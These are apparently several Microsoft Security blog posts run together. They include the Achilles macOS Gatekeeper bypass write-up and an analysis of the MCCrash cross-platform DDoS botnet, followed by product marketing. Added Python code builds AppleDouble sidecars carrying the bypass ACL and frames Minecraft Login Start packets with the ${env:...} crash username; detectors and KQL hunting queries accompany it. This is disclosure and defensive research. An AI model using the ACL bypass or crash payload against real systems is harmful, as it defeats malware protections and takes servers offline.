Figure 4. Using AppleDouble in a zip file to preserve extended attributes
Using this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.
Our first approach was to generate many large extended attributes in the AppleDouble format so that there would not be enough space left to assign the com.apple.quarantine extended attribute. Interestingly, this doesn’t work: an AppleDouble file is ignored if its overall size exceeds 2 GB, and there is no limit on the number of extended attributes a file can have (other than the size of the disk).
Researching further, we decided to examine the source code of the unarchiving mechanism. Carefully studying the copyfile_unpack implementation, we discovered an option for a special extended attribute named com.apple.acl.text (saved in the XATTR_SECURITY_NAME constant in the source code), which is used to set arbitrary Access Control Lists.
Figure 5. The code that allows setting arbitrary Access Control Lists
Using ACLs for exploitation
Access Control Lists (ACLs) are a mechanism in macOS that extends the traditional permission model. The traditional permission model stores the permissions for each file in a file “mode”, which can be changed using the chmod utility. It enforces permissions for the owning user, the owning group, and others in terms of reading (r), writing (w), and executing (x). A file’s mode can be viewed by listing files with the “-l” (long) flag:
Figure 6. Viewing the “hello.sh” file mode: the owner can do anything, while others can only read or execute it
Unlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the chmod utility and viewed with the ls utility. It’s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:
Figure 7. Denying file reads from everyone makes it impossible to read the file despite its mode
The set of authorizations supported by ACLs is well documented by Apple in the chmod manual and contains more than the traditional read, write, and execute abilities, including:
writeattr: controls the ability to write attributes to the file
writeextattr: controls the ability to write extended attributes to the file
writesecurity: controls the ability to set ACLs to the file
chown: controls the ability to set the owner of the file
delete: controls the ability to delete the file
Equipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the com.apple.quarantine attribute.
Two minor challenges that we had to overcome during the proof-of-concept (POC) development were:
The format of the ACL text as saved in the AppleDouble file isn’t identical to the format of the chmod command line. This can easily be overcome by invoking the macOS acl_to_text API and saving the ACL with the correct format.
When using the ditto utility, the com.apple.acl.text extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.
Therefore, our POC is as follows:
Create a fake directory structure with an arbitrary icon and payload.
Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of “everyone deny write,writeattr,writeextattr,writesecurity,chown”). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
Create an archive with the application alongside its AppleDouble file and host it on a web server.
We named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:
The AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:
Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass
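Added example, not the blog’s own code or its POC: a small Python builder and inspector for the extended-attribute area of an AppleDouble “._” sidecar. It covers the mechanism shown in Figures 3 and 4 (extended attributes travelling inside an archive next to the file) and the detection approach the closing section mentions, namely flagging a com.apple.acl.text attribute whose ACL denies writeextattr. The field layout follows the apple_double_header, attr_header and attr_entry structures in XNU’s vfs_xattr.c as the author of this example reads them; the ATTR header offset (byte 82) and the ACL text syntax (modeled on acl_to_text output) are assumptions to verify against the source before using this on real archives. All sample attribute values are constructed.

```python
import struct
from typing import Dict

# Layout constants as read from XNU bsd/vfs/vfs_xattr.c by the author of this
# example (assumption: verify against the source before relying on exact offsets).
ADH_MAGIC = 0x00051607
ADH_VERSION = 0x00020000
AD_RESOURCE = 2            # entry type: resource fork
AD_FINDERINFO = 9          # entry type: Finder info; the xattr area follows it
ATTR_HDR_MAGIC = 0x41545452  # b"ATTR"
FINDERINFOSIZE = 32
ADH_SIZE = 26              # magic, version, 16-byte filler, entry count
AD_ENTRY_SIZE = 12         # type, offset, length
ATTR_HDR_SIZE = 36         # magic, debug_tag, total_size, data_start, data_length,
                           # 3 reserved words, flags, num_attrs

# ACL text in the shape acl_to_text(3) emits for the page's
# "everyone deny write,writeattr,writeextattr,writesecurity,chown"
# (constructed; the exact line syntax is an assumption).
ACHILLES_ACL = (b"!#acl 1\n"
                b"group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:"
                b"write,writeattr,writeextattr,writesecurity,chown\n")


def _entry_len(namelen: int) -> int:
    # attr_entry: 11 fixed bytes plus the NUL-terminated name, rounded up to 4 bytes.
    return (11 + namelen + 3) & ~3


def build_appledouble(xattrs: Dict[str, bytes]) -> bytes:
    """Serialize a '._' sidecar that carries only the given extended attributes."""
    finfo_off = ADH_SIZE + 2 * AD_ENTRY_SIZE       # 50: Finder info follows the two entries
    attr_hdr_off = finfo_off + FINDERINFOSIZE      # 82: xattr header follows Finder info
    names = [n.encode() + b"\0" for n in xattrs]
    entries_end = attr_hdr_off + ATTR_HDR_SIZE + sum(_entry_len(len(n)) for n in names)
    data_start = (entries_end + 3) & ~3
    data = b"".join(xattrs.values())
    total_size = data_start + len(data)

    out = bytearray(struct.pack(">II16sH", ADH_MAGIC, ADH_VERSION, b"Mac OS X", 2))
    out += struct.pack(">III", AD_FINDERINFO, finfo_off, total_size - finfo_off)
    out += struct.pack(">III", AD_RESOURCE, total_size, 0)   # empty resource fork at the end
    out += b"\0" * FINDERINFOSIZE
    out += struct.pack(">IIIIIIIIHH", ATTR_HDR_MAGIC, 0, total_size, data_start,
                       len(data), 0, 0, 0, 0, len(names))
    off = data_start
    for name, value in zip(names, xattrs.values()):
        entry = struct.pack(">IIHB", off, len(value), 0, len(name)) + name
        out += entry + b"\0" * (_entry_len(len(name)) - len(entry))
        off += len(value)
    out += b"\0" * (data_start - len(out)) + data
    assert len(out) == total_size
    return bytes(out)


def parse_appledouble_xattrs(blob: bytes) -> Dict[str, bytes]:
    """Return the extended attributes stored in an AppleDouble sidecar ({} if none)."""
    magic, version, _filler, count = struct.unpack_from(">II16sH", blob, 0)
    if magic != ADH_MAGIC or version != ADH_VERSION:
        raise ValueError("not an AppleDouble v2 file")
    entries = [struct.unpack_from(">III", blob, ADH_SIZE + i * AD_ENTRY_SIZE)
               for i in range(count)]
    finfo = next((e for e in entries if e[0] == AD_FINDERINFO), None)
    if finfo is None or finfo[2] <= FINDERINFOSIZE:
        return {}                                  # no room for an xattr header
    hdr_off = finfo[1] + FINDERINFOSIZE
    (hmagic, _tag, total_size, data_start, _data_len,
     _r0, _r1, _r2, _flags, num_attrs) = struct.unpack_from(">IIIIIIIIHH", blob, hdr_off)
    if hmagic != ATTR_HDR_MAGIC:
        return {}
    result, pos = {}, hdr_off + ATTR_HDR_SIZE
    for _ in range(num_attrs):
        off, length, _eflags, namelen = struct.unpack_from(">IIHB", blob, pos)
        name = blob[pos + 11:pos + 11 + namelen].rstrip(b"\0").decode()
        if off < data_start or off + length > total_size or off + length > len(blob):
            raise ValueError(f"attribute {name!r} points outside the data area")
        result[name] = bytes(blob[off:off + length])
        pos += _entry_len(namelen)
    return result


def achilles_indicator(xattrs: Dict[str, bytes]) -> bool:
    """True when a sidecar carries an ACL that denies writeextattr, the Achilles pattern."""
    acl = xattrs.get("com.apple.acl.text")
    if acl is None:
        return False
    lines = acl.decode("utf-8", errors="replace").lower().splitlines()
    return any("deny" in ln and "writeextattr" in ln for ln in lines)
```

The inspector deliberately keys on the deny of writeextattr rather than on the full ACL string: any ACL that stops the extracting process from adding extended attributes to the target defeats quarantine assignment, whatever else it denies. To scan an archive, extract it with a tool that does not apply AppleDouble metadata, then pass each “._” file’s bytes through parse_appledouble_xattrs.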
Improving security for all through research and threat intelligence sharing
The threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues—regardless of the platform or device in use.
As environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing Microsoft Defender for Endpoint to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved Microsoft Defender’s Vulnerability Management capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on macOS devices by examining AppleDouble files misusing ACLs.
This case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.
Our Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users’ computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.
We’re excited to announce that Microsoft is named a Leader in The Forrester Wave: Security Analytics Platforms, Q4 2022. Microsoft achieved the highest possible score in 17 different criteria, including partner ecosystem, innovation roadmap, product security, case management, and architecture.
With threats like ransomware increasing in volume and complexity, it’s never been more important for chief information security officers (CISOs) to invest in solutions that will keep their companies safe and running. As the threat landscape continues to proliferate, cloud-native security information and event management (SIEM) solutions like Microsoft Sentinel have become a central part of a SecOps solution and have evolved to meet the new needs of customers to move faster.
We believe this placement validates our continued investment in Microsoft Sentinel, security research, and threat intelligence. We take it as a vote of confidence in our ability to keep our customers safe and working fearlessly. Microsoft Security is named a leader on seven different Forrester Wave reports and continues to invest in innovative solutions that work together to keep our customers’ businesses safer.
Microsoft was evaluated on several capabilities that empower customers to move faster to identify, investigate, and remediate threats. Some particularly important features include:
Providing flexibility to customers to create their own rules using Kusto Query Language (KQL) or by bringing their own machine learning. This allows security operations center (SOC) teams to build automations that work for their organization and reduces the amount of time spent on repetitive tasks.
Comprehensive threat intelligence that empowers customers to keep up with the evolving threat landscape.
Scaled search and storage of large volumes of data allow customers to protect their digital ecosystems at scale and monitor all their clouds, platforms, and endpoints in one place.
The Microsoft Sentinel strategy
Microsoft Sentinel is a next-generation SIEM solution that collects security data across multicloud, multi-platform data sources. The comprehensive SOC platform provides user and entity behavior analytics (UEBA), threat intelligence, and security orchestration, automation, and response (SOAR) capabilities, along with deep integration with Microsoft Defender threat protection products for comprehensive coverage across SIEM and extended detection and response (XDR). Sentinel empowers companies to leverage cloud-scale, innovative AI and automation to move at machine speed and stay ahead of evolving threats.
What makes the Microsoft suite of security solutions unique is the native integrations of SIEM with XDR to provide quick setup, more comprehensive coverage and context, and faster response time. Customers who leverage Microsoft Defender XDR products may be eligible for discounts on Microsoft Sentinel data ingestion.
Over the past year, Microsoft has invested in many new capabilities, including content for Internet of Things (IoT) devices, business application coverage including SAP, enhanced SOAR capabilities, and improved workflow management. These capabilities help our customers to protect more of their digital ecosystem, automate responses to more types of threats, and build an efficient and collaborative SOC.
What’s next in Microsoft Security
Microsoft is dedicated to continued leadership in security. Continued investments will provide customers with the intelligence, automation, and scalability they need to protect their businesses and work efficiently. Upcoming enhancements include the integration of more threat intelligence, new ways to hunt across large sets of data, and more context and prioritization guidance in alerts. New AI solutions will allow SecOps teams to more easily identify the most urgent issues and give guidance on how similar customers have reacted to similar incidents. The Microsoft vision is to provide a central platform for SOCs to understand the health of their entire business and quickly act on issues.
Microsoft Security is committed to empowering SecOps teams with security tools and platforms that enable the critical protection your users rely on. To experience Microsoft Sentinel at your organization, get started with a free trial today.
Malware operations continue to rapidly evolve as threat actors add new capabilities to existing botnets, increasingly targeting and recruiting new types of devices. Attackers update malware to target additional operating systems, ranging from PCs to IoT devices, growing their infrastructure rapidly. The Microsoft Defender for IoT research team recently analyzed a cross-platform botnet that originates from malicious software downloads on Windows devices and succeeds in propagating to a variety of Linux-based devices.
The botnet spreads by enumerating default credentials on internet-exposed Secure Shell (SSH)-enabled devices. Because IoT devices are commonly enabled for remote configuration with potentially insecure settings, these devices could be at risk of attacks like this botnet’s. The botnet’s spreading mechanism makes it a unique threat: while the malware can be removed from the infected source PC, it could persist on unmanaged IoT devices in the network and continue to operate as part of the botnet.
Microsoft tracks this cluster of activity as DEV-1028, a cross-platform botnet that infects Windows devices, Linux devices, and IoT devices. The DEV-1028 botnet is known to launch distributed denial of service (DDoS) attacks against private Minecraft servers.
Our analysis of the DDoS botnet revealed functionalities specifically designed to target private Minecraft Java servers using crafted packets, most likely as a service sold on forums or darknet sites. A breakdown of the systems affected by the botnet over the three months from the time of this analysis also revealed that most of the devices were in Russia:
Figure 1. IP distribution of devices infected by the botnet
This type of threat stresses the importance of ensuring that organizations manage, keep up to date, and monitor not just traditional endpoints but also IoT devices that are often less secure. In this blog post, we share details on how this botnet affects multiple platforms, its DDoS capabilities, and recommendations for organizations to prevent their devices from becoming part of a botnet. We also share Minecraft server version information for owners of private servers to update and ensure they are protected from this threat.
Cross-platform botnet targets SSH-enabled devices
Microsoft researchers observed that the initial infection points related to the botnet were devices infected through the installation of malicious cracking tools that purport to acquire illegal Windows licenses.
Figure 2. Cracking tools used to spread the botnet.
The cracking tools contain additional code that downloads and launches a fake version of svchost.exe through a PowerShell command. In some cases, the downloaded file is named svchosts.exe.
Figure 3. The code of the .NET executable that downloads and runs svchost.exe
Next, svchost.exe launches malicious.py, the main Python script that contains all the logic of the botnet, which then scans the internet for SSH-enabled Linux-based devices (Debian, Ubuntu, CentOS, and IoT workloads such as Raspbian, which are commonly enabled for remote configuration) and launches a dictionary attack to propagate. Once a device is found, it downloads the file Updater.zip from repo[.]ark-event[.]net onto the device, which creates the file fuse. The fuse file then downloads a copy of malicious.py onto the device. Both svchost.exe and fuse are compiled using PyInstaller, which bundles the Python runtime and the libraries necessary to run malicious.py.
Figure 4. The DDoS botnet attack flow
malicious.py is compiled to operate on both Windows and Linux-based devices, with some functionality specific to each (on Windows, for example, it establishes persistence by adding a value under the registry key Software\Microsoft\Windows\CurrentVersion\Run with the executable as the data). The file communicates with its command-and-control (C2) server as follows:
Establish TCP connection to repo[.]ark-event[.]net on port 4676.
Send initial connection string.
Receive a key from the server for encryption and decryption, and then encrypt further communication using the Fernet symmetric algorithm.
Send version information to the server:
Windows device: The current Windows version
Linux device: Hardcoded version (2.19 in the sample we analyzed)
Continue receiving encrypted commands from the server
Based on our analysis, the botnet is primarily used to launch DDoS attacks against private Minecraft servers using known server DDoS commands and unique Minecraft commands. Below is the list of commands established in the code:
SYNC: Check that malware is running
PROXY_<url>: Set proxy servers
DOWNLOAD_<url>: Download file
EXEC_<command>: Run specific command line
SCANNER[ON|OFF]: Default credentials attack on SSH servers to spread
ATTACK_TCP: Send random TCP payloads
ATTACK_[HOLD|HANDSHAKE]: Send random TCP payloads through proxy
ATTACK_UDP: Send random UDP payloads
ATTACK_VSE: Attack on Valve Source Engine protocol
ATTACK_RAKNET: Attack on RakNet protocol (used by Minecraft servers)
ATTACK_NETTY: Minecraft Login Handshake packet
ATTACK_[MCBOT|MINE]: Minecraft Login Start packet
ATTACK_[MCPING|PING]: Minecraft Login Success packet
ATTACK_MCDATA: Minecraft Login Handshake, Login Start, and Close Window packets
ATTACK_MCCRASH: Minecraft Login Handshake and Login Start packets, using a username containing an env variable
ATTACK_JUNK: Send Tab-Complete packet
ATTACK_HTTP-GET: Send GET request
ATTACK_HTTP-FAST: Send HEAD request
STOP_ATTACK: Stop the previous attack
While most of the commands are methods of DDoS, the most notable command run by the botnet is ATTACK_MCCRASH. The command sends ${env:random payload of specific size:-a} as the username in order to exhaust the resources of the server and make it crash.
Figure 5. MCCrash TCP payload seen in a packet capture
TCP payloads on port 25565 have the following binary structure:
Bytes [0:1] – Size of packet
Bytes [1:2] – Login Start command
Bytes [2:3] – Size of username
Bytes [3:18] – Username string
The ${env:…} syntax in the username triggers a Log4j 2 lookup when the server logs the login attempt, which causes abnormal consumption of system resources (this is not related to the Log4Shell vulnerability), demonstrating a specific and highly efficient DDoS method.
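The Login Start framing laid out above, as an added example (not the botnet’s code or Microsoft’s): Python helpers that encode and decode the Minecraft protocol VarInt, build the packet the way the byte layout describes it, and parse a captured 25565/tcp payload back into a username. The detection goes slightly beyond the page in that it flags any ${prefix: Log4j-style lookup in the username, not only env. The packet id 0x00 for Login Start (as in the 1.12.2 protocol) and the sample usernames are the example author’s assumptions.

```python
import random
import re
import string
from typing import Optional, Tuple

LOGIN_START_ID = 0x00   # packet id of Login Start in the login state (1.12.2-era protocol)
MINECRAFT_PORT = 25565
# Log4j 2 lookup syntax inside a string, e.g. ${env:FOO:-default}. MCCrash uses env;
# the pattern also catches other lookup prefixes.
LOOKUP_RE = re.compile(r"\$\{[A-Za-z]+:")


def encode_varint(value: int) -> bytes:
    """Minecraft protocol VarInt: 7 payload bits per byte, high bit set while more follow."""
    if value < 0:
        value &= 0xFFFFFFFF
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def decode_varint(buf: bytes, pos: int = 0) -> Tuple[int, int]:
    """Return (value, position after the VarInt); rejects truncated or over-long encodings."""
    result, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated VarInt")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7
        if shift >= 35:
            raise ValueError("VarInt longer than 5 bytes")


def build_login_start(username: str) -> bytes:
    """Frame a Login Start packet: VarInt length, VarInt id, VarInt-prefixed UTF-8 name."""
    name = username.encode("utf-8")
    body = encode_varint(LOGIN_START_ID) + encode_varint(len(name)) + name
    return encode_varint(len(body)) + body


def mccrash_username(filler_len: int = 5) -> str:
    """The ${env:<random>:-a} shape from the page; 5 filler chars give a 15-byte name."""
    filler = "".join(random.choices(string.ascii_uppercase, k=filler_len))
    return "${env:" + filler + ":-a}"


def parse_login_start(payload: bytes) -> Optional[str]:
    """Return the username if payload is a well-formed Login Start packet, else None."""
    try:
        length, pos = decode_varint(payload)
        if length != len(payload) - pos:
            return None
        packet_id, pos = decode_varint(payload, pos)
        if packet_id != LOGIN_START_ID:
            return None
        name_len, pos = decode_varint(payload, pos)
    except ValueError:
        return None
    name = payload[pos:pos + name_len]
    if len(name) != name_len:
        return None
    return name.decode("utf-8", errors="replace")


def is_mccrash_payload(payload: bytes) -> bool:
    """Flag a Login Start whose username carries a lookup; a legitimate name never does."""
    name = parse_login_start(payload)
    return name is not None and LOOKUP_RE.search(name) is not None
```

With a 15-byte username the length VarInt, packet id and string length each fit in one byte, which is why the page can describe the payload with fixed byte offsets; the VarInt helpers are what make the parser hold up when a longer name or a different packet pushes a field past one byte.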
A wide range of Minecraft server versions could be affected
While testing the impact of the malware, researchers found that the malware itself was hardcoded to target a specific version of Minecraft server, 1.12.2. However, all versions between 1.7.2 and 1.18.2 can be affected by this method of attack. A slight modification of the Minecraft protocol in server version 1.19, released earlier in 2022, prevents the Minecraft-specific commands (ATTACK_MCCRASH, ATTACK_[MCBOT|MINE], and ATTACK_MCDATA) from working without modification of the attack code.
Figure 6. Distribution of Minecraft servers by version
Figure 7. Distribution of Minecraft servers that could be affected by MCCrash
The wide range of at-risk Minecraft servers highlights the impact this malware could have had if it was specifically coded to affect versions beyond 1.12.2. The unique ability of this threat to utilize IoT devices that are often not monitored as part of the botnet substantially increases its impact and reduces its chances of being detected.
Protecting endpoints from cross-platform DDoS botnets like MCCrash
To harden devices and networks against threats like MCCrash, organizations must implement the basics of securing identities and devices, including limiting access. Solutions must detect downloads of malicious programs and malicious attempts to gain access to SSH-enabled devices, and generate alerts on anomalous network behavior. Below are some of our recommendations for organizations:
Ensure employees are not downloading cracking tools as these are abused as an infection source for spreading malware.
Increase network security by enforcing multi-factor authentication (MFA) methods such as Azure Active Directory (now part of Microsoft Entra) MFA. Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
Microsoft 365 Defender protects against attacks related to botnets by coordinating threat data across identities, endpoints, cloud apps, email, and documents. Such cross-domain visibility allows Microsoft 365 Defender to comprehensively detect and remediate end-to-end attack chains, from malicious downloads to their follow-on activities on endpoints. This rich set of tools, such as advanced hunting, lets defenders surface threats and gain insights for hardening networks against compromise.
Adopt a comprehensive IoT security solution such as Microsoft Defender for IoT to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender. Defender for IoT is updated regularly with indicators of compromise (IoCs) from threat research like the example described in this blog, alongside rules to detect malicious activity.
On the IoT device level:
Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.
Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.
Use least-privilege access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.
For users hosting private Minecraft servers, update to version 1.19.1 and above.
Adopt a comprehensive Windows security solution
Manage the apps your employees can use through Windows Defender Application Control and, for unmanaged devices, enable Smart App Control.
For commercial customers, enable application and browser controls such as Microsoft Defender Application Guard for enhanced protection for Office and Edge.
Perform timely cleanup of all unused and stale executables sitting on your organizations’ devices.
Protect against advanced firmware attacks by enabling memory integrity, Secure Boot, and Trusted Platform Module 2.0 if they are not enabled by default; these harden the boot process using capabilities built into modern CPUs.
Microsoft Defender Antivirus detects the malware used in this attack as the following:
TrojanDownloader:MSIL/MCCrash.NZM!MTB
Trojan:Win32/MCCrash.MA!MTB
TrojanDownloader:Python/MCCrash!MTB
Trojan:Python/MCCrash.A
TrojanDownloader:Linux/MCCrash!MTB
Trojan:Python/MCCrash.RPB!MTB
Trojan:Python/MCCrash.RPC!MTB
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:
Emerging threat activity group DEV-1028 detected
System file masquerade
Anomaly detected in ASEP registry
Suspicious process launched using cmd.exe
Suspicious file launch
Microsoft Defender for IoT
MCCrash-related activity on IoT devices would raise the following alerts in Microsoft Defender for IoT:
Unauthorized SSH access
Excessive login attempts
Microsoft Defender for Cloud
Microsoft Defender for Cloud raises the following alert for related activity:
VM_SuspectDownload
Advanced hunting queries
Run the following queries to search for related files in your environment:
DeviceFileEvents
| where SHA256 in ("e3361727564b14f5ee19c40f4e8714fab847f41d9782b157ea49cc3963514c25","143614d31bdafc026827e8500bdc254fc1e5d877cb96764bb1bd03afa2de2320","f9c7dd489dd56e10c4e003e38428fe06097aca743cc878c09bf2bda235c73e30","4e65ec5dee182070e7b59db5bb414e73fe87fd181b3fc95f28fe964bc84d2f1f","eb57788fd2451b90d943a6a796ac5e79f0faf7151a62c1d07b744a351dcfa382","93738314c07ea370434ac30dad6569c59a9307d8bbde0e6df9be9e2a7438a251","202ac3d32871cb3bf91b7c49067bfc935fbc7f0499d357efead1e9f7f5fcb9d1")
DeviceFileEvents
| where FolderPath endswith @":\windows\svchost.exe"
DeviceRegistryEvents
| where RegistryKey contains "CurrentVersion\\Run"
| where RegistryValueName == "br" or RegistryValueData contains "svchost.exe" or RegistryValueData contains "svchosts.exe"
DeviceProcessEvents
| where FileName in~ ("cmd.exe", "powershell.exe")
| where ProcessCommandLine has_all ("-command", ".downloadfile(", "windows/svchost.exe")
David Atch, Maayan Shaul, Mae Dotan, Yuval Gordon, Microsoft Defender for IoT Research Team
Ross Bevington, Microsoft Threat Intelligence Center (MSTIC)
Security teams contend with relentless bad actors, evolving attack tactics, and numerous surfaces and endpoints that attackers may try to exploit. With the average cost of a data breach reaching an all-time high of USD4.35 million in 2022,1 protecting your people and data from adversaries is more important than ever. Plus, juggling multiple cybersecurity technologies can exacerbate the stress further. But while modern threats are increasingly complex, your security solution doesn’t have to be.
Microsoft Security solutions help you eliminate gaps and gain the simplified, comprehensive protection and expertise you need to innovate and grow in a changing world. You gain the capabilities to match the pace of adversaries, who develop and deploy threats at a frenzied pace hoping to exploit basic trust or human error. A panicked and tumultuous response isn’t the answer. Instead, Microsoft Security brings you a comprehensive solution across clouds and platforms and helps you do more with less by enabling you to be more efficient, effective, and unified.
But what do we mean when we say do more with less? We mean easing IT departments’ workload with technology that delivers a deliberate and effective security response. We mean increasing efficiencies and adapting to unexpected events quickly—everything from the pandemic to economic uncertainty. We mean managing the security of your business with fewer resources. And we mean giving back time so that security professionals can focus on the most important things.
Doing more with less is about a change in mindset and it doesn’t have to mean sacrifice. To further explain how this works in the real world, let’s explore three strategies of the do more with less approach and consider success stories from customers that have benefitted from each approach.
1. Simplify vendor management
When you hear do more with less, simplicity is likely one of the first attributes that come to mind. Protecting what’s most important to your organization is critical. However, juggling multiple technology vendors adds unwelcome complexity. Our research shows that large organizations have an average of 75 security solutions. Managing multiple vendors can be burdensome for IT while valuable security insights sit siloed in separate dashboards. And siloed solutions can result in fragmented visibility and can be exploited.
Several features of Microsoft Security support simplified vendor management. By choosing Microsoft Security as your comprehensive security solution, you can eliminate redundant capabilities, and consolidate the number of vendor contracts you manage. You can avoid the challenges of managing multiple vendors, each with its own contracts and licenses. Paring down the number of disparate security solutions can even help you realize up to 60 percent cost savings when you use our security, compliance, and identity solutions in Microsoft 365 E3 and Microsoft 365 E5.2
One Microsoft customer that has realized the value of simplified vendor management is Rabobank, a financial institution based in the Netherlands, which uses Microsoft 365 E3 and Microsoft 365 E5. The firm decreased its security vendors from more than 20 to 4, with Microsoft as its main vendor. Switching to Microsoft Defender for Cloud for cloud threat and vulnerability management alone saved the company €400,000, and Microsoft Security has replaced multiple security information and event management (SIEM) systems.
“Our engineering team previously spent most of its time working to keep everything up and running and trying to integrate all those systems,” said Raoul van der Voort, Global Service Owner, Cyber Defense Center, Rabobank. “It’s difficult to ensure that we have full insights from a security perspective when our platforms are so varied. We wanted protection and visibility everywhere. That’s why we use Defender for Cloud—it gives us single pane of glass visibility across our hybrid and multicloud environment.”
Up to 60 percent in savings from simplifying your vendor approach
Our 60 percent savings calculation is an estimate based on the cost and complexity of buying point solutions from multiple vendors for cybersecurity coverage. Available estimated pricing indicates it would cost a company about USD63 per user per month for a representative basket of solutions covering typical security, compliance, identity, management, and privacy needs.
However, by adding E5 advanced compliance and security to Microsoft 365 E3 core security and compliance, these same companies can reduce their costs to approximately USD24 per user per month, based on web direct prices for Microsoft offerings. This represents savings of up to 60 percent. It also means fewer vendors to manage, more efficient operations, lower costs, and reduced cyberthreat risk. All of these benefits can result from helping organizations do more with less.
Figure 1: Potential cost savings of up to 60 percent when consolidating security solutions by using Microsoft 365 E5 Compliance and Security add-ons to a Microsoft 365 E3 license instead of using multiple point solutions. Savings are based on publicly available estimated pricing for other vendor solutions and the web direct price shown for Microsoft offerings. Price is not guaranteed and subject to change.
2. Reduce threats with AI and automation
With threats stretching IT teams to the limit—and talent gaps making it difficult to fill open roles—people can use a boost. AI, machine learning, and automation help humans protect sensitive data, detect and respond faster to threats, and more accurately predict future attacks and insider risks.
AI and automation tools also help you more easily manage and govern on-premises multicloud and software-as-a-service (SaaS) data. Improve compliance, monitor and remediate potentially risky activity, and safely enable productive work for employees using multiple devices in multiple locations.
Organizations are also using AI and machine learning to:
Filter events and make connections between incidents.
Focus the IT team’s threat investigation on the biggest security issues.
Disrupt ransomware attacks, which traditionally are “discovered” only when the ransom note arrives.
Consumer goods giant Land O’Lakes, Inc., must navigate cybersecurity challenges in an environment that includes 9,000 employees, nearly 10,000 endpoints, a significant on-premises infrastructure, Google Cloud Platform, and Amazon Web Services clouds, in addition to its main cloud platform, Microsoft Azure. That results in a lot to track. The company, which is headquartered in the United States, uses security and compliance solutions in Microsoft 365 E5 to have visibility into its threat landscape. It also leverages built-in AI and machine learning in Microsoft Sentinel and Microsoft Defender for Cloud to proactively manage threats and reduce alert fatigue.
“The Microsoft tools we use are native to the platform,” said Michael Marsh, Senior Security Engineer, Land O’Lakes. “Microsoft combines a tremendous volume of telemetry from around the world, which helps us understand where we need to direct our attention so that we can protect Land O’Lakes.”
3. Improve operational efficiency
Increasing SecOps efficiency saves considerable time. Unified SIEM and extended detection and response (XDR) improve visibility across identities and endpoints. A deeply integrated solution from Microsoft Security makes it easier to protect your identities, devices, apps, and data against breaches.
United Kingdom sporting goods retailer Frasers Group realized that adding iconic new brands required a flexible, interoperable tool set. It found what it needed in Microsoft’s SIEM and XDR solution: Microsoft Sentinel for a single view into security threats and alerts, and Microsoft 365 Defender for tailored protection.
“The XDR capabilities Microsoft offers are second to none. Microsoft Sentinel layers built-in SOC capabilities with playbooks functionality,” said Matthew Wilmot, Group Head of Enterprise Security, Frasers Group. “The automation it provides is key to keeping our SOC team lean. Without it, we would need to triple our team.”
Security for all
Comprehensive security means adopting an end-to-end approach that harnesses the power of AI to protect against internal and external cyberthreats and secure multicloud environments. Protect your organization, people, and data for a more secure future and satisfy increasingly intricate compliance regulations. People are arguably the most important piece of this. When protected, they are free to focus on what matters most.
Explore Microsoft Security to learn how our solutions can help give everyone in your organization peace of mind and how embracing a do more with less approach to security can help make you more efficient, effective, and unified.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
2 Savings based on publicly available estimated pricing for other vendor solutions and the web direct price shown for Microsoft offerings. Price is not guaranteed and subject to change.
Today, the third edition of Cyber Signals was released spotlighting security trends and insights gathered from Microsoft’s 43 trillion daily security signals and 8,500 security experts. In this edition, we share new insights on wider risks that converging IT, Internet of Things (IoT), and operational technology (OT) systems pose to critical infrastructure. Cyber Signals presents new data on these risks with practical recommendations for enterprises.
OT is a combination of hardware and software across programmable systems or devices that interact with the physical environment (or manage devices that interact with the physical environment). Examples of OT can include building management systems, fire control systems, and physical access control mechanisms, like doors and elevators.
